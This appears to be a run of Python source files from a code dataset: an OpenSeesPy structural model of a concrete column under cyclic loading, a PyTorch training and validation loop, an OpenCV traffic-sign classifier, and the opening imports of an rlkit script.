z0=(self.dim_trav_colum_base/2)-rec\n\n #Fibra del Concreto Confinado\n Eti_quad_conf=1\n numSubdivIJ=10\n numSubdivJK=10\n crdsI=[y0, z0]\n crdsJ=[y0, -z0]\n crdsK=[-y0, -z0]\n crdsL=[-y0, z0]\n ops.patch(\"quad\", Eti_quad_conf, numSubdivIJ, numSubdivJK, *crdsI , *crdsJ , *crdsK , *crdsL)\n\n #Fibra del Concreto no Confinado\n y1=self.dim_travs_colum_altura/2\n z1=self.dim_trav_colum_base/2\n\n Eti_quad_noconf=2\n numSubdivIJ=1\n numSubdivJK=4\n crdsI=[y1, z1]\n crdsJ=[-y1, z1]\n crdsK=[y1, z0]\n crdsL=[-y1, z0]\n ops.patch(\"quad\", Eti_quad_noconf, numSubdivIJ, numSubdivJK, * crdsI , * crdsJ , * crdsK , * crdsL)\n\n crdsI=[y1, -z1]\n crdsJ=[-y1, -z1]\n crdsK=[-y1, -z0]\n crdsL=[y1, -z0]\n ops.patch(\"quad\", Eti_quad_noconf, numSubdivIJ, numSubdivJK, * crdsI , * crdsJ , * crdsK , * crdsL)\n\n crdsI=[y1, z0]\n crdsJ=[y1, -z0]\n crdsK=[y0, -z0]\n crdsL=[y0, z0]\n ops.patch(\"quad\", Eti_quad_noconf, numSubdivIJ, numSubdivJK, * crdsI , * crdsJ , * crdsK , * crdsL)\n\n crdsI=[-y1, -z0]\n crdsJ=[-y1, z0]\n crdsK=[-y0, z0]\n crdsL=[-y0, -z0]\n ops.patch(\"quad\", Eti_quad_noconf, numSubdivIJ, numSubdivJK, * crdsI , * crdsJ , * crdsK , * crdsL)\n\n #Definir el acero longitudinal\n matTag=4\n #Definir acero longitudinal superior\n numFiber=var_sup_inf\n start=[y0, z0]\n end=[y0, -z0]\n ops.layer(\"straight\", matTag, numFiber, areaFiber, *start, *end)\n\n #Definir acero longitudinal 
inferior\n numFiber=var_sup_inf\n start=[-y0, z0]\n end=[-y0, -z0]\n ops.layer(\"straight\", matTag, numFiber, areaFiber, *start, *end)\n\n #Definir acero longitudinal derecha\n numFiber=var_der_izq\n start=[y0, z0]\n end=[-y0, z0]\n ops.layer(\"straight\", matTag, numFiber, areaFiber, *start, *end)\n\n #Definir acero longitudinal izquierda\n numFiber=var_der_izq\n start=[y0, -z0]\n end=[-y0, -z0]\n ops.layer(\"straight\", matTag, numFiber, areaFiber, *start, *end)\n\n #Definir agregador de sección \n Eti_Agr=2\n ops.section(\"Aggregator\", Eti_Agr, 3, \"Vy\", \"-section\", col_sec)\n\n #Definir la transformacion de coordenadas\n eti_Transf=1\n ops.geomTransf(\"Linear\", eti_Transf)\n\n #Definir los elementos de la columna\n Eti_beam=1\n N=2\n ops.beamIntegration(\"Lobatto\", Eti_beam, Eti_Agr, N )\n eleTag=1\n eleNodes=[1, 2]\n ops.element(\"dispBeamColumn\", eleTag, * eleNodes, eti_Transf, Eti_beam)\n\n #Definir el recorder\n nodo=2\n dof=1\n ops.recorder(\"Node\", \"-file\", self.FILE_INTER_ENS, \"-time\", \"-node\", nodo, \"-dof\", dof, \"disp\")\n ops.recorder(\"Node\", \"-file\", self.FILE_DESPLAZAMIENTO, \"-time\", \"-node\", 2, \"-dof\", 1, 2, 3, \"disp\")\n ops.recorder(\"Node\", \"-file\", self.FILE_REAC_BASE, \"-time\", \"-node\", 1, \"-dof\", 1, 2, 3, \"reaction\")\n\n #Definir los patrones de carga\n ops.timeSeries(\"Constant\", 1)\n ops.pattern(\"Plain\", 1, 1)\n ops.load(nodo, 0.0, -968, 0.0)\n\n # Definir los parametros de analisis\n ops.integrator(\"LoadControl\", 0)\n ops.system(\"SparseGeneral\", \"-piv\")\n ops.test(\"NormDispIncr\", 1.0e-4, 2000)\n ops.constraints(\"Plain\")\n ops.numberer(\"Plain\")\n ops.algorithm(\"KrylovNewton\")\n ops.analysis(\"Static\")\n\n ok=ops.analyze(1)\n if ok==0:\n print(\"CARGA AXIAL APLICADA\")\n else:\n print(\"ERROR AL APLICAR LA CARGA AXIAL\")\n ops.wipeAnalysis()\n\n if ok==0:\n \n # Definir patron de carga\n ops.timeSeries(\"Linear\", 2)\n ops.pattern(\"Plain\", 2, 2)\n ops.load(nodo, 1, 0.0, 0.0)\n \n #Definir los nodos de la estructura\n nodos=np.loadtxt(self.data_file)\n num_nodos=len(nodos)\n\n for i in range(len(nodos)):\n x=float(nodos[i])\n\n ops.integrator(\"DisplacementControl\", nodo, dof, x)\n ops.analysis(\"Static\")\n ops.analyze(1)\n\n ops.wipeAnalysis()\n ops.remove(\"recorders\")\n \n #Personalizar la carga de los datos\n \n serie_total= [] \n\n if self.calculo == 'REACCION_BASE' : \n array_mek=np.loadtxt(self.FILE_REAC_BASE)\n self.construye_figura(array_mek,serie=[1,2,3], recoder=self.calculo) \n\n\n elif self.calculo == 'DESPLAZAMIENTO_1': \n array_mek=np.loadtxt(self.FILE_DESPLAZAMIENTO)\n self.construye_figura(array_mek,serie=[1,2,3], recoder=self.calculo)\n\n else: \n datos_1=np.loadtxt(self.FILE_REAC_BASE) \n datos_2=np.loadtxt(self.FILE_INTER_ENS) \n datos_3=np.loadtxt(self.FILE_DESPLAZAMIENTO)\n\n serie_total = [[ datos_1, [1,2,3],'REACCION_BASE' ], [ datos_2, [1], 'INTERSECCION' ], [ datos_3, [1,2,3],'DESPLAZAMIENTO' ], ]\n #self.construye_figura(serie_total=serie_total, recoder='*')\n \n nodo=[1, 2]\n dof=[1, 2, 3]\n\n nodo1=nodo[0]\n nodo2=nodo[1]\n\n gra_liber1=dof[0]\n gra_liber2=dof[1]\n gra_liber3=dof[2]\n\n #Resultados\n\n RESULTADOS = []\n\n RESULTADOS.append(str(\"El desplazamiento en el nodo: \" + str(nodo2)+ \" para el grado de libertad: \"+str(gra_liber1)+\" es: \"+str(ops.nodeDisp(2, 1))+\" m\") ) \n RESULTADOS.append(str(\"El desplazamiento en el nodo: \" + str(nodo2)+ \" para el grado de libertad: \"+str(gra_liber2)+\" es: \"+str(ops.nodeDisp(2, 2))+\" m\") ) \n RESULTADOS.append(str(\"El 
desplazamiento en el nodo: \" + str(nodo2)+ \" para el grado de libertad: \"+str(gra_liber3)+\" es: \"+str(ops.nodeDisp(2, 3))+\" m\") ) \n\n RESULTADOS.append(str(\"La reaccción en el nodo: \" + str(nodo1)+ \" para el grado de libertad: \"+str(gra_liber1)+\" es: \"+str(ops.nodeReaction(1, 1))+\" N\" ))\n RESULTADOS.append(str(\"La reaccción en el nodo: \" + str(nodo1)+ \" para el grado de libertad: \"+str(gra_liber2)+\" es: \"+str(ops.nodeReaction(1, 2))+\" N\") )\n RESULTADOS.append(str(\"La reaccción en el nodo: \" + str(nodo1)+ \" para el grado de libertad: \"+str(gra_liber3)+\" es: \"+str(ops.nodeReaction(1, 3))+\" N\") )\n\n RESULTADOS.append(str(\"La reaccción en el elemento: \"+ str(nodo1)+ \" para el grado de libertad:\"+ str(gra_liber1)+\" es:\"+str(ops.nodeReaction(1, 1))+\" N\"))\n\n if serie_total:\n self.construye_figura(serie_total=serie_total, recoder='*', resultados=RESULTADOS)\n\n self.mostrar_resultados(lista_mensajes=RESULTADOS) \n\n\n #Este el el modelo realizado en el laboratorio \n self.construye_figura([array_mek, array_mek_lab])\n\n\n def construye_figura(self, array_mek=None, serie=[], recoder=None, serie_total=[], resultados=[]):\n \n \"\"\"Construye una figura basado en un array de datos, una serie de gráficos \n \"\"\"\n \n titulo = None \n \n if recoder != '*':\n\n ventana_principal = plt.figure(0)\n ventana_principal.canvas.set_window_title(recoder)\n\n for i in serie:\n plt.subplots_adjust(hspace=0.70)\n plt.subplot(2,2,i)\n titulo = \"RESPUESTA : GRADO DE LIBERTAD #{}\".format(i) \n plt.title(titulo) \n plt.xlabel('Tiempo (seg)')\n plt.ylabel('Desplazamiento (m)')\n print (\"Normal :\",i)\n plt.plot(array_mek[:,0], array_mek[:,i],label=\"Resultado\")\n plt.legend() \n else :\n \n from PIL import Image\n import matplotlib.image as mpimg\n import os\n from pathlib import Path\n \n BASE_DIR = Path(__file__).resolve().parent.parent\n\n IMAGEN_COLUMNA = os.path.join(os.path.join(BASE_DIR,'modelos'), 'Carga_ciclica_01.jpeg')\n\n pil_img = Image.open(IMAGEN_COLUMNA)\n\n\n num_subplots = 0\n \n for elemento in serie_total:\n num_subplots += len(elemento[1]) \n \n if num_subplots % 2 != 0:\n num_subplots+=1\n \n fig = plt.figure()\n\n\n FILAS = 3\n COLUMNAS = 3\n ax1 = plt.subplot2grid((FILAS, COLUMNAS), (0, 0), rowspan=2)\n ax2 = plt.subplot2grid((FILAS, COLUMNAS), (2, 0))\n ax3 = plt.subplot2grid((FILAS, COLUMNAS), (0, 1))\n ax4 = plt.subplot2grid((FILAS, COLUMNAS), (1, 1))\n ax5 = plt.subplot2grid((FILAS, COLUMNAS), (2, 1))\n ax6 = plt.subplot2grid((FILAS, COLUMNAS), (0, 2))\n ax7 = plt.subplot2grid((FILAS, COLUMNAS), (1, 2))\n ax8 = plt.subplot2grid((FILAS, COLUMNAS), (2, 2))\n \n #Para controlar el subplot de Resultados se visualice\n if COLUMNAS == 4: \n ax9 = plt.subplot2grid((3,4), (0, 3), rowspan=3)\n \n\n for columna, elemento in enumerate(serie_total): \n \n array_mek = elemento[0]\n serie = elemento[1]\n calculo_var = elemento[2]\n \n if calculo_var == 'REACCION_BASE': \n \n ax3.plot(array_mek[:,0], array_mek[:,serie[0]],'tab:orange')\n ax3.set_title(f\" {calculo_var}\\nGRADO DE LIBERTAD # {serie[0]}\", fontsize=8)\n ax3.set_xlabel('Fuerza (kN)')\n ax3.set_ylabel('Desplazamiento (mm)')\n \n ax4.plot(array_mek[:,0], array_mek[:,serie[1]],'tab:orange')\n ax4.set_title(f\" {calculo_var}\\nGRADO DE LIBERTAD # {serie[1]}\", fontsize=8)\n ax4.set_xlabel('Fuerza (kN)')\n ax4.set_ylabel('Desplazamiento (mm)')\n \n ax5.plot(array_mek[:,0], array_mek[:,serie[2]],'tab:orange')\n ax5.set_title(f\" {calculo_var}\\nGRADO DE LIBERTAD # {serie[2]}\", fontsize=8)\n 
ax5.set_xlabel('Fuerza (kN)')\n ax5.set_ylabel('Desplazamiento (mm)')\n\n elif calculo_var == 'INTERSECCION':\n \n ax1.imshow(pil_img) \n ax1.set_title(f\" ENSAYO POR CARGA CÍCLICA\", fontsize=8)\n ax1.axes.xaxis.set_visible(False)\n ax1.axes.yaxis.set_visible(False)\n\n #ax4.plot(array_mek[0][:,1], array_mek[0][:,0],'tab:orange')\n ens_opensees=np.loadtxt(self.FILE_INTER_ENS)\n ens_lab=np.loadtxt(self.data_file_lab)\n ax2.plot(ens_opensees[:,1], ens_opensees[:,0],'tab:green')\n ax2.plot(ens_lab[:,0], ens_lab[:,1],'tab:orange')\n ax2.set_title(f\" INTERSECCIÓN DE ENSAYOS\", fontsize=10)\n ax2.set_xlabel('Desplazamiento (m)')\n ax2.set_ylabel('Fuerza (kN)')\n\n\n else:\n\n ax6.plot(array_mek[:,0], array_mek[:,serie[0]],'tab:red')\n ax6.set_title(f\" {calculo_var}\\nGRADO DE LIBERTAD # {serie[0]}\", fontsize=8)\n ax6.set_xlabel('Fuerza (kN)')\n ax6.set_ylabel('Desplazamiento (m)')\n \n ax7.plot(array_mek[:,0], array_mek[:,serie[1]],'tab:red')\n ax7.set_title(f\" {calculo_var}\\nGRADO DE LIBERTAD # {serie[1]}\", fontsize=8)\n ax7.set_xlabel('Fuerza (kN)')\n ax7.set_ylabel('Desplazamiento (m)')\n\n ax8.plot(array_mek[:,0], array_mek[:,serie[2]],'tab:red')\n ax8.set_title(f\" {calculo_var}\\nGRADO DE LIBERTAD # {serie[2]}\", fontsize=8)\n ax8.set_xlabel('Fuerza (kN)')\n ax8.set_ylabel('Desplazamiento (m)') \n \n if COLUMNAS == 4:\n self.mostrar_resultados(lista_mensajes=resultados,ax=ax9)\n\n fig.suptitle(\"MODELOS MATEMÁTICOS: ENSAYOS FISICOS\") \n fig.subplots_adjust(left=0.05, bottom=0.076, right=0.971, top=0.88, wspace=0.562, hspace=1)\n \n mng = plt.get_current_fig_manager()\n mng.set_window_title(\"MODELOS MATEMÁTICOS UTPL\")\n mng.resize(*mng.window.maxsize()) \n plt.show() \n\n ","sub_path":"ensayos/tanaka_park.py","file_name":"tanaka_park.py","file_ext":"py","file_size_in_byte":18736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"98113345","text":"from typing import Optional, Dict, Any, Tuple\n\nimport torch\nimport torch.optim\nimport torch.utils.data.dataloader\nimport torch.utils.tensorboard.writer\n\n\ndef train_loop(model: torch.nn.Module,\n loss_func: torch.nn.Module,\n dataloader: torch.utils.data.dataloader.DataLoader,\n epoch: int,\n iteration: int,\n optimizer: Any, # from torch.optim (i.e. Adam, SGD, ...)\n scheduler: Any, # from torch.optim.lr_scheduler (i.e. 
MultiStepLR)\n writer: Optional[torch.utils.tensorboard.writer.SummaryWriter] = None,\n device: torch.device = torch.device(\"cuda\")) -> Tuple[float, int]:\n \"\"\" Training loop\n Implements the forward + backward pass for each sample and obtains the loss on the training data\n \"\"\"\n model.train()\n\n train_running_loss = 0.0\n train_loss_dict = None if writer is None else loss_dict()\n\n for sample in dataloader:\n optimizer.zero_grad()\n\n loss_sample = forward_pass(model, sample, device)\n\n loss = loss_func(loss_sample, train_loss_dict)\n train_running_loss += loss.item()\n loss.backward()\n\n # If we want gradient clipping:\n # clipping_value = 1 # arbitrary value of your choosing\n # torch.nn.utils.clip_grad_value_(model.parameters(), clipping_value)\n optimizer.step()\n\n scheduler.step()\n iteration += 1\n\n train_loss = train_running_loss / len(dataloader)\n\n if writer is not None:\n writer.add_scalar('train loss', train_loss, epoch)\n\n for key, value in train_loss_dict.items():\n writer.add_scalar(key + '_train', value / len(dataloader), epoch)\n\n return train_loss, iteration\n\n\ndef val_loop(model: torch.nn.Module,\n loss_func: torch.nn.Module,\n dataloader: torch.utils.data.dataloader.DataLoader,\n epoch: int,\n writer: Optional[torch.utils.tensorboard.writer.SummaryWriter] = None,\n device: torch.device = torch.device(\"cuda\"),\n dataset_type: str = 'val') -> float:\n \"\"\" Validation loop (no backprop)\n Obtains the loss on the validation (or test) data\n \"\"\"\n model.eval()\n\n val_running_loss = 0.0\n val_loss_dict = loss_dict()\n\n # Get val data loss\n for sample in dataloader:\n with torch.no_grad():\n loss_sample = forward_pass(model, sample, device)\n\n loss = loss_func(loss_sample, val_loss_dict)\n\n val_running_loss += loss.item()\n\n val_loss = val_running_loss / len(dataloader)\n\n if writer is not None:\n writer.add_scalar('val loss'.format(dataset_type), val_loss, epoch)\n\n for key, value in val_loss_dict.items():\n writer.add_scalar('{}_{}'.format(key, dataset_type), value / len(dataloader), epoch)\n\n return val_loss\n\n\ndef forward_pass(model: torch.nn.Module,\n sample: Dict[str, torch.Tensor],\n device: torch.device) -> Dict[str, torch.Tensor]:\n \"\"\" Forward pass of the network for a given sample\n \"\"\"\n img = sample['img'].to(device)\n bboxes = sample['bboxes'].to(device)\n labels = sample['labels'].to(device)\n bboxes_mask = sample['bboxes_mask'].to(device)\n\n # Forward pass\n ploc, plabel, *aux_out = model(img)\n\n # Create the loss sample\n loss_sample = {}\n loss_sample['ploc'] = ploc\n loss_sample['plabel'] = plabel\n loss_sample['bboxes'] = bboxes\n loss_sample['labels'] = labels\n loss_sample['bboxes_mask'] = bboxes_mask\n\n # Check if we should include auxiliary\n if sample['auxiliary'].all() and aux_out is not None:\n loss_sample['scene_gt'] = sample['scene_id'].to(device)\n loss_sample['scene_pred'] = aux_out[0]\n\n loss_sample['depth_gt'] = sample['depth'].to(device)\n loss_sample['depth_pred'] = aux_out[1]\n\n loss_sample['normals_gt'] = sample['normals'].to(device)\n loss_sample['normals_mask'] = sample['normals_mask'].to(device)\n loss_sample['normals_pred'] = aux_out[2]\n\n return loss_sample\n\n\ndef loss_dict() -> Dict[str, float]:\n \"\"\" Initialize loss dictionary for network sub-tasks\n \"\"\"\n\n # Add z in front of each key name so they appear on the bottom (and together) in tensorboard\n d = {'z_normals_loss': 0.0, 'z_scene_loss': 0.0, 'z_depth_loss': 0.0, 'z_conf_loss': 0.0, 'z_loc_loss': 0.0}\n return 
d\n","sub_path":"rock/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":4388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"46561698","text":"import cv2\nimport sys\nimport numpy as np\nimport random\n\n# Image names\nimages = [\"bumpy_road.jpg\",\n \"dangerous_descendent.jpg\",\n \"exit.jpg\",\n \"freeway_entry.jpg\",\n \"give_way.jpg\",\n \"go_left.jpg\",\n \"go_right.jpg\",\n \"go_straight.jpg\",\n \"local_destination.jpg\",\n \"major_road_sign.jpg\",\n \"no_entry.jpg\",\n \"no_parking.jpg\",\n \"stop_sign.jpg\",\n \"tourist_destination.jpg\",\n \"traffic_light_ahead.jpg\",\n \"speed_limit.jpg\",\n ]\nstage_3_images = [\"bumpy_road.png\",\n \"give_way.png\",\n \"no_parking.png\",\n \"stop.png\",\n \"tourist_destination.png\",\n \"traffic_lights_ahead.png\",\n ]\nstage_4_images = [\"bumpy_road.png\",\n \"circular.png\",\n \"sign.png\",\n \"traffic.png\",\n ]\n\n\nclass Color:\n\n def __init__(self, dom_color=None, clrs=[], clrv=[]):\n self.dominant_color = dom_color\n self.colors = clrs\n self.red = clrv[0]\n self.blue = clrv[1]\n self.green = clrv[2]\n self.yellow = clrv[3]\n self.brown = clrv[4]\n self.white = clrv[5]\n self.black = clrv[6]\n\n\nclass Sign:\n\n def __init__(self, img):\n self.image = cv2.imread(img)\n self.HSV_img = cv2.cvtColor(self.image, cv2.COLOR_BGR2HSV)\n self.grey_img = cv2.imread(img, 0)\n self.h = self.image.shape[0]\n self.w = self.image.shape[1]\n self.area = self.h * self.w\n self.findCnts()\n self.findShape()\n self.findColours()\n self.findSign()\n self.category_determined = False\n self.type_determined = False\n\n def findCnts(self):\n\n # Apply Canny\n self.canned = cv2.Canny(self.grey_img, 150, 150, apertureSize=3)\n\n # Closing structuring element\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (2, 2))\n\n # Close the gaps\n self.closed = cv2.morphologyEx(self.canned, cv2.MORPH_CLOSE, kernel)\n\n # Find Contours\n self.contours, self.hierarchy = cv2.findContours(self.closed, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n self.removeBorder()\n\n self.removeText()\n\n def removeBorder(self):\n\n # Find the contours from the Canny rather than the closing\n contours, hierarchy = cv2.findContours(self.canned, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n # Initialize the mask\n no_border = np.zeros(self.grey_img.shape, np.uint8)\n\n # Find the borders\n for i, h in enumerate(hierarchy[0]):\n\n cnt = contours[i]\n\n # Find the area of the contour\n area = cv2.contourArea(cnt)\n\n if area == 0 :\n # Create a mask with the border\n mask = np.zeros(self.grey_img.shape, np.uint8)\n cv2.drawContours(mask, [cnt], 0, 255, -1)\n\n # Add the border to the main mask\n no_border = cv2.add(no_border, mask)\n\n if np.array_equiv(no_border, np.zeros(self.grey_img.shape, np.uint8)):\n pass\n\n else:\n # Invert thr mask\n no_border_mask = cv2.bitwise_not(no_border)\n\n # Apply the mask\n no_border_img = cv2.bitwise_and(self.closed, no_border_mask)\n\n # Change the canned\n self.canned = no_border_img\n\n # Closing structuring element\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (2, 2))\n\n # Close the gaps\n self.closed = cv2.morphologyEx(self.canned, cv2.MORPH_CLOSE, kernel)\n\n def removeText(self):\n # Define the closing structuring element\n kernel_2 = cv2.getStructuringElement(cv2.MORPH_RECT, (3, 3))\n\n # ----Stage 1----\n\n\n # Initialize the mask\n no_text = np.zeros(self.grey_img.shape, np.uint8)\n\n # Close the main image\n closed_2 = cv2.morphologyEx(self.canned, 
cv2.MORPH_CLOSE, kernel_2)\n\n # Find external contours and hierarchy\n contours, hierarchy = cv2.findContours(self.closed, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n hier = hierarchy[0]\n\n # Find the text\n for i, h in enumerate(hier):\n cnt = contours[i]\n if cv2.contourArea(cnt) < 0.15 * self.area:\n # Create a mask with the text\n mask = np.zeros(self.grey_img.shape, np.uint8)\n cv2.drawContours(mask, [cnt], 0, 255, -1)\n # Add to the main mask\n no_text = cv2.add(no_text, mask)\n if np.array_equiv(no_text, np.zeros(self.grey_img.shape, np.uint8)):\n # Use the second closing\n self.closed = closed_2\n\n # Find the contours for the new closed\n self.contours, self.hierarchy = cv2.findContours(self.closed, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n else:\n # Invert the msak\n no_text_mask = cv2.bitwise_not(no_text)\n\n # Apply the mask\n no_text_img = cv2.bitwise_and(closed_2, no_text_mask)\n # ----Stage 2----\n\n # Find contours and hierarchy for the new image\n contours, hierarchy = cv2.findContours(no_text_img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n hier = hierarchy[0]\n\n # Initialize the mask\n no_text = np.zeros(self.grey_img.shape, np.uint8)\n\n # Find the text\n for i, h in enumerate(hier):\n cnt = contours[i]\n if cv2.contourArea(cnt) < 0.03 * self.area:\n # Create a mask with the text\n mask = np.zeros(self.grey_img.shape, np.uint8)\n cv2.drawContours(mask, [cnt], 0, 255, -1)\n # Add to the main mask\n no_text = cv2.add(no_text, mask)\n # pixelpoints = np.transpose(np.nonzero(mask))\n\n # Invert the mask\n no_text_mask = cv2.bitwise_not(no_text)\n\n # Apply the mask\n no_text_img = cv2.bitwise_and(no_text_img, no_text_mask)\n\n # Use the second closing\n self.closed = no_text_img\n\n # Find the contours for the new closed\n self.contours, self.hierarchy = cv2.findContours(self.closed, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n def findShape(self):\n # Initialise edges value\n self.edges = 0\n\n for i, h in enumerate(self.hierarchy[0]):\n # Assign the contour\n cnt = self.contours[i]\n # Find the outer contour\n if h[3] == -1 and h[2] != -1:\n\n # Approximate the contour\n epsilon_1 = 0.025 * cv2.arcLength(cnt, True)\n approx_1 = cv2.approxPolyDP(cnt, epsilon_1, True)\n self.edges = len(approx_1)\n if self.edges == 8:\n epsilon_2 = 0.01 * cv2.arcLength(cnt, True)\n approx_2 = cv2.approxPolyDP(cnt, epsilon_2, True)\n self.edges = len(approx_2)\n break\n\n if self.edges == 3:\n self.shape = \"Triangle\"\n elif self.edges == 4:\n self.shape = \"Rectangle\"\n elif self.edges == 8:\n self.shape = \"Octagon\"\n elif self.edges > 8:\n self.shape = \"Circle\"\n else:\n self.shape = \"Undetermined\"\n\n def findColours(self):\n\n red = 0\n yellow = 0\n blue = 0\n brown = 0\n green = 0\n white = 0\n black = 0\n colors = []\n dom_clr = \"\"\n for i in range(self.h):\n for j in range(self.w):\n point = self.HSV_img[i][j]\n if point[2] < 30:\n black = black + 1\n elif point[1] < 30:\n white = white + 1\n elif (5 >= point[0] >= 0) or (180 >= point[0] >= 165):\n red = red + 1\n elif 15 >= point[0] >= 5:\n brown = brown + 1\n elif 30 >= point[0] >= 20:\n yellow = yellow + 1\n elif 85 >= point[0] >= 65:\n green = green + 1\n elif 100 >= point[0] >= 90:\n blue = blue + 1\n\n dominant_color = max(red, brown, yellow, green, blue)\n\n if dominant_color == red:\n dom_clr = \"red\"\n elif dominant_color == brown:\n dom_clr = \"brown\"\n elif dominant_color == yellow:\n dom_clr = \"yellow\"\n elif dominant_color == green:\n dom_clr = \"green\"\n elif dominant_color == blue:\n dom_clr = 
\"blue\"\n else:\n dom_clr = \"not defined\"\n if yellow > 0.01 * self.area:\n colors.append(\"yellow\")\n if blue > 0.02 * self.area:\n colors.append(\"blue\")\n if brown > 0.04 * self.area:\n colors.append(\"brown\")\n if green > 0.01 * self.area:\n colors.append(\"green\")\n if red > 0.23 * self.area:\n colors.append(\"red\")\n if 0.4 * self.area > black > 0.015 * self.area:\n colors.append(\"black\")\n\n clr = Color(dom_clr, colors, [red, blue, green, yellow, brown, white, black])\n self.color = clr\n\n def findSign(self):\n # Based on colors alone\n if 'brown' in self.color.colors:\n self.category = \"Information Sign\"\n self.type = \"Tourist Destination\"\n elif 'yellow' in self.color.colors:\n if 'green' in self.color.colors:\n self.category = \"Warning Sign\"\n self.type = \"Traffic Lights Ahead\"\n else:\n self.category = \"Information Sign\"\n self.type = \"Exit\"\n elif 'green' in self.color.colors:\n self.category = \"Information Sign\"\n self.type = \"Major Road Sign\"\n elif set(['red', 'blue']).issubset(set(self.color.colors)):\n self.category = \"Prohibitory Signs\"\n self.type = \"No Parking\"\n elif self.edges == 3:\n if 'yellow' in self.color.colors:\n self.category = \"Warning Sign\"\n self.type = \"Traffic Lights Ahead\"\n elif 'black' in self.color.colors:\n self.category = \"Warning Sign\"\n self.findTri()\n else:\n self.category = \"Prohibitory Signs\"\n self.type = \"Give Way\"\n elif self.edges == 4:\n self.category = \"Information Sign\"\n\n if 'yellow' in self.color.colors:\n self.type = \"Exit\"\n elif \"blue\" in self.color.colors:\n self.type = \"Freeway Entry\"\n elif \"green\" in self.color.colors:\n self.type = \"Major Road Sign\"\n else:\n self.type = \"Undetermined\"\n elif self.edges == 5:\n self.category = \"Information Sign\"\n if 'brown' in self.color.colors:\n self.type = \"Tourist Destination\"\n else:\n self.type = \"Local Destination\"\n elif self.edges == 8:\n self.category = \"Prohibitory Signs\"\n self.type = \"Stop\"\n elif self.edges > 8:\n if 'red' in self.color.colors:\n self.category = \"Prohibitory Signs\"\n if 'blue' in self.color.colors:\n self.type = \"No Parking\"\n else:\n self.type = \"No Entry\"\n elif 'blue' in self.color.colors:\n self.category = \"Direction Sings\"\n self.findOrientation()\n else:\n self.category = \"Information Signs\"\n self.type = \"End Speed Limit\"\n else:\n self.category = \"Undetermined\"\n self.type = \"Undetermined\"\n\n def findTri(self):\n # Extract hier\n hier = self.hierarchy[0]\n\n for i, h in enumerate(hier):\n if h[0] == -1 and h[2] == -1:\n cnt = self.contours[i]\n epsilon_tri = 0.02 * cv2.arcLength(cnt, True)\n approx_tri = cv2.approxPolyDP(cnt, epsilon_tri, True)\n if len(approx_tri) >= 4:\n self.type = \"Bumpy Road\"\n elif len(approx_tri) == 4:\n self.type = \"Give way\"\n else:\n self.type = \"Dangerous Descendent\"\n\n def findOrientation(self):\n # Extract hier\n hier = self.hierarchy[0]\n\n # Initialize the count\n count = 0\n\n # Find the arrow contour and the arrow count\n for i, h in enumerate(hier):\n if h[0] == -1 and h[1] == -1 and h[2] == -1:\n cnt = self.contours[i]\n if cv2.arcLength(cnt, True) > 200:\n\n self.arrow_cnt = self.contours[i]\n count = count+1\n\n if count > 1:\n self.type = \"Circular\"\n else :\n # Assigning initial values\n right = 0\n left = 0\n cnt = self.arrow_cnt\n (x, y), (MA, ma), angle = cv2.fitEllipse(cnt)\n print(angle)\n\n if angle > 120 :\n self.type = \"Go Straight\"\n return\n\n # Find the approximation\n epsilon = 0.02 * cv2.arcLength(cnt, True)\n 
approx = cv2.approxPolyDP(cnt, epsilon, True)\n # Determine whether the contour is on the left of the right\n for apx in approx:\n if apx[0][0] < ((self.w / 2) - 15):\n left = left + 1\n elif apx[0][0] > ((self.w / 2) + 15):\n right = right + 1\n if left > right:\n self.type = \"Go Left\"\n else:\n self.type = \"Go Right\"\n return\n\n\n\ndef stage1_images(sign = \"all\",show = True):\n if sign == \"all\":\n for im in images:\n img = \"stage_1\\\\\"+im\n sign = Sign(img)\n if show == True:\n cv2.imshow(\"original\",sign.image)\n cv2.waitKey()\n print(sign.category)\n print(sign.type)\n else:\n img = \"stage_1\\\\\" + sign + \".jpg\"\n sign = Sign(img)\n if show == True:\n cv2.imshow(\"original\", sign.image)\n cv2.waitKey()\n print(sign.category)\n print(sign.type)\n\ndef stage2_images(sign = \"all\",show = True):\n if sign == \"all\":\n for im in images:\n img = \"stage_2\\\\\"+im\n sign = Sign(img)\n if show == True:\n cv2.imshow(\"original\",sign.image)\n cv2.waitKey()\n print(sign.category)\n print(sign.type)\n else:\n img = \"stage_2\\\\\" + sign + \".jpg\"\n sign = Sign(img)\n if show == True:\n cv2.imshow(\"original\", sign.image)\n cv2.waitKey()\n print(sign.category)\n print(sign.type)\n\ndef stage3_images(sign = \"all\",show = True):\n if sign == \"all\":\n for im in stage_3_images:\n img = \"stage_3\\\\\"+im\n sign = Sign(img)\n if show == True:\n cv2.imshow(\"original\",sign.image)\n cv2.waitKey()\n print(sign.category)\n print(sign.type)\n else:\n img = \"stage_3\\\\\" + sign + \".png\"\n sign = Sign(img)\n if show == True:\n cv2.imshow(\"original\", sign.image)\n cv2.waitKey()\n print(sign.category)\n print(sign.type)\n\ndef stage4_images(sign = \"all\",show = True):\n if sign == \"all\":\n for im in stage_4_images:\n img = \"stage_4\\\\\"+im\n sign = Sign(img)\n if show == True:\n cv2.imshow(\"original\",sign.image)\n cv2.waitKey()\n print(sign.category)\n print(sign.type)\n else:\n img = \"stage_4\\\\\" + sign + \".png\"\n sign = Sign(img)\n if show == True:\n cv2.imshow(\"original\", sign.image)\n cv2.waitKey()\n print(sign.category)\n print(sign.type)\n\n\n\n","sub_path":"testing/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":16117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"357365075","text":"from rlkit.envs.remote import RemoteRolloutEnv\nfrom rlkit.misc import eval_util\nfrom rlkit.samplers.rollout_functions import rollout\nfrom rlkit.torch.core import PyTorchModule\nimport rlkit.torch.pytorch_util as ptu\nimport argparse\nimport pickle\nimport uuid\nfrom rlkit.core import 